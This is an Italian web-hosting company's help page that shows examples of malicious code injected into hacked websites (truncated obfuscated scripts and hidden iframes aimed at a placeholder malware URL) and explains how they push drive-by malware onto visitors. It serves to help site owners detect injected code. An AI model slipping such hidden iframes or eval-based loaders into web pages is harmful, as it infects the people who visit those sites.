Home I nostri servizi Chi siamo | Mission | F.a.q | Assistenza | Rivenditori | Web Farm
 
 
HOSTING
9NET POSTA CERTIFICATA
FIRMA DIGITALE
MARCA TEMPORALE
CLOUD COMPUTING
OBJECT STORAGE
CLOUD MONITORING
PRIVATE CLOUD
SERVER
FILE SHARING
ECOMMERCE
HDSL
STREAMING
SERVIZI DI COMUNICAZIONE
VOLETE SAPERNE DI PIU' ?
Il nostro ufficio commerciale è a Vostra disposizione per qualsiasi informazione.
 
 
Richiedi Informazioni
 
Sarete contattati al più presto con la soluzione giusta per il Vostro business.
Root / 10 - Sicurezza / CODICE MALEVOLO (Alcuni esempi)


CODICE MALEVOLO (Alcuni esempi)
 

A volte può succedere che, attraverso applicazioni web vulnerabili o furto delle proprie credenziali di accesso al sito, venga inserito nelle pagine web del proprio dominio un codice potenzialmente pericoloso.
Riportiamo di seguito alcuni esempi, non esaustivi, di come si può presentare tale codice:



<script>function v47e ...etc... 4950543E'));</script>
<iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
<script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
<!-- ~ --><div style="visibility:hidden"><iframe src="http://url_contenente_malware" width=100 height=80></iframe></div><!-- ~ -->
In genere questi codici hanno una o più delle seguenti caratteristiche :


Hanno la proprietà "visibility: hidden" per risultare non visibili nella normale navigazione del sito.
Utilizzano una codifica per nascondere il loro contenuto alla lettura del sorgente.
Richiamano pagine esterne ai server 9Net
, generalmente pagine che risiedono su server compromessi e contenenti malware.
Lo scopo principale per cui un soggetto può tentare di immettere tali codici in un sito lecito, è la diffusione di malware ai visitatori di tale sito. In pratica, se è presente un codice simile a quelli indicati in precedenza, il browser di un generico visitatore viene reindirizzato sulla pagina esterna richiamata dal codice.
Su tale pagina può essere presente un malware che cerca di installarsi sul computer del visitatore tentando di sfruttare un certo numero di vulnerabilità note.
Se il PC del visitatore non è adeguatamente protetto c'è il concreto rischio che venga infettato.


Nel caso si dovesse individuare sul proprio dominio codice simile a quello indicato, è consigliato seguire le istruzioni presenti al link:


http://servizi.9net.it/FAQ/article.asp?CatID=56&ID=323



Argomenti correlati
OPERAZIONI CONSIGLIATE PER LA SICUREZZA DEL PC
OPERAZIONI CONSIGLIATE PER LA SICUREZZA DEI DATI
SICUREZZA DELLE VOSTRE APPLICAZIONI WEB
VULNERABILITA' JOOMLA ver. 1.5
COME COMPORTARSI IN CASO DI CODICE MALEVOLO SUL PROPRIO SITO



9Net S.r.l. - Via Caldera 21, 20153 Milano (MI) - Tel. 02 39.19.091 Fax 02 39.19.09.29 - P.Iva e C.F. 02714840960 - R.E.A. 1542830
Copyright 2007 - All right reserved - Informativa sulla privacy
ATOdesign